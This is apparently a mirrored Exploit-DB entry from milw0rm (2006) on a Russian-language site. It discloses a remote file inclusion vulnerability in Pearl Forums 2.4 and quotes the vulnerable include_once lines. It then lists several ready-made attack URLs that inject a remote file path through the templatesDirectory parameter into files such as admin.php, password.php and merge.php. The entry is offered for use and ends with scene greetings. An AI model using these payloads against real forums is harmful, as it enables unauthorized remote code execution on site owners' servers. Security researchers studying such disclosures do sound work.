- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2826
- Проверка EDB
-
- Пройдено
- Автор
- 3L3CTRIC-CRACKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2006-11-21
Код:
_____ __ __ __ ___
| __ \ | \/ | \ \ / (_)
| | | |_ __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
| | | | '__| | |\/| |/ _` \ \/ / \ \/ / | | '__| | | / __|
| |__| | | | | | | (_| |> < \ / | | | | |_| \__ \
|_____/|_| |_| |_|\__,_/_/\_\ \/ |_|_| \__,_|___/
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main Script Of Pearl Products
//Affected Version:2.4
//D
script:http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=switch&filename=pearlforums2.4.zip&351611
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------
Bug in
adressbook.php & admin.php & merge.php &
more than
u expected files r vulnerable just try to check all files
Like the Vulnerable Scripts Of Pearl
--------------------------------------------------------------------------------\\
-------------------------------------------------------------------------------
Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
include_once("$templatesDirectory/admin.php");
-----------------------------------------------------------------------------------
Exploits:
~~~~~~~~~
Note that more variables are not sanitized so Exploits can work
Successfuly when
register_globals=on
code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill
code
And Many Bug u can discovered just download the script
-----------------------------------------------------------------------------------
Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
Special Gr33Ts:ASIANEAGLE & Kacper & The Master
////////////////////////////////////////////////////////////////////////////////////
# milw0rm.com [2006-11-21]- Источник
- www.exploit-db.com
